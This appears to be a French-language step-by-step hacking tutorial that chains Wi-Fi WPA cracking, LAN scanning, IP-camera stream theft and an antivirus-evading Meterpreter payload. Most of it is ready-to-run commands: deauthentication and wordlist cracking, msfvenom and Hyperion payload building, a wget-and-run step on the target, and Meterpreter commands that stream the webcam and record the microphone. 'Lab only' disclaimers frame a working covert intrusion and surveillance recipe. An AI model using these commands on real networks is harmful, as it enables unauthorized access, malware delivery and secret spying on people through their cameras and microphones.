🧠 C’est quoi ce délire ?
*Phantom Breach* te guide dans une infiltration Wi-Fi en environnement contrôlé : crack WPA, cartographie LAN, exploitation d’appareils connectés, et interception de comms. Avec Hyperion pour l’obfuscation, c’est du hacking furtif et pro – mais toujours 100% éthique et lab only, hein, mon gars ! 😎
🛠️ Prérequis
- Système : Kali Linux (à jour :
apt update && apt full-upgrade). - Matériel : Carte Wi-Fi mode monitor (ex. Alfa AWUS036NHA, chipset Atheros AR9271).
- Réseau cible : Wi-Fi perso en lab (WPA/WPA2).
- Outils : aircrack-ng, nmap, metasploit-framework, ffmpeg, hyperion, wireshark.
⚠️ Avertissement légal
Ce tuto est pour des tests en lab sur TON réseau ou avec autorisation explicite. Tout usage illégal est hors jeu – reste clean !
🔓 Étape 1 : Pénétration Wi-Fi avec aircrack-ng
Objectif : Récupérer la clé WPA/WPA2 pour squatter le LAN.
Procédure
- ID interface :
→ wlan0.iwconfig - Mode monitor :
→ wlan0mon.airmon-ng start wlan0 - Scan réseaux :
→ BSSID (ex. 00:11:22:33:44:55), canal 6, ESSID TestLab.airodump-ng wlan0mon - Capture handshake :
airodump-ng -c 6 --bssid 00:11:22:33:44:55 -w capture wlan0mon - Forcer handshake :
→ “WPA handshake” dans capture-01.cap.aireplay-ng -0 10 -a 00:11:22:33:44:55 wlan0mon - Crack clé :
→ Clé : SecretKey123.aircrack-ng -w /usr/share/wordlists/rockyou.txt -b 00:11:22:33:44:55 capture-01.cap - Connexion :
nmcli dev wifi connect TestLab password SecretKey123
Analyse : Le handshake, c’est l’échange d’authentification capturé. Avec la clé, t’es dans le LAN comme un ghost légit !
🗺️ Étape 2 : Cartographie LAN avec nmap
Objectif : Repérer les cibles et leurs failles.
Procédure
- IP locale :
→ 192.168.1.10, plage 192.168.1.0/24.ifconfig wlan0 - Découverte hôtes :
→ 192.168.1.100 (PC), 192.168.1.101 (caméra).nmap -sn 192.168.1.0/24 - Scan ports :
→ 80/http, 445/smb, 554/rtsp.nmap -p- -sV 192.168.1.100
Analyse : RTSP = caméra, SMB/HTTP = PC vulnérable. T’as une carte des cibles, maestro !
💥 Étape 3 : Exploitation avec Metasploit & Hyperion
Objectif : Piquer des flux vidéo/audio avec obfuscation.
3.1 : Caméra IP (RTSP)
- Lancer Metasploit :
msfconsole - Module RTSP :
→ Accès au flux si vulnérable.search rtsp use auxiliary/scanner/rtsp/vlc_bypass set RHOSTS 192.168.1.101 set RPORT 554 run - Récup flux :
→ VLC :ffmpeg -i rtsp://192.168.1.101:554/live -f mpegts udp://192.168.1.100:1234udp://@:1234.
Analyse : Une caméra sans auth forte = jackpot vidéo en live !
3.2 : PC avec Meterpreter obfusqué
- Payload brut :
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe -o phantom_raw.exe - Hyperion :
→ Payload chiffré.git clone https://github.com/nullsecuritynet/tools.git cd tools/hyperion make ./hyperion phantom_raw.exe phantom.exe - Serveur :
python3 -m http.server 8000 - Listener :
msfconsole use multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.1.100 set LPORT 4444 run - Déploiement (lab) : Sur cible :
wget http://192.168.1.100:8000/phantom.exe && phantom.exe - Exploitation :
webcam_stream record_mic -d 5 download webcam_* mic_*
Analyse : Hyperion dodge les AV, Meterpreter te donne webcam et micro – furtivité max !
📡 Étape 4 : Interception avec Wireshark
Objectif : Sniffer le trafic LAN.
Procédure
- Lancer Wireshark :
wireshark & - Interface : wlan0.
- Filtres :
- HTTP :
http.request - TLS :
tls.handshake - IoT :
udpoutcp.port == 80
- HTTP :
- Analyse : Données en clair (ex. HTTP), métadonnées TLS (ex. api.whatsapp.com).
Analyse : TLS bloque le contenu, mais les métadonnées parlent – IoT en clair = bonus !
🧾 Disclaimer
⚠️ Lab only! Usage non autorisé = illégal. Fais gaffe, pas de garantie !
Créateur : Platon-y pour PCTamalou.